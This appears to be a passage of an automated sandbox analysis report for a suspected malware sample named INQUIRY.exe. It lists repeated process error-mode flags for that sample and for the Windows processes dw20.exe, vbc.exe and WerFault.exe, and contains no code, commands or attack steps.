                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
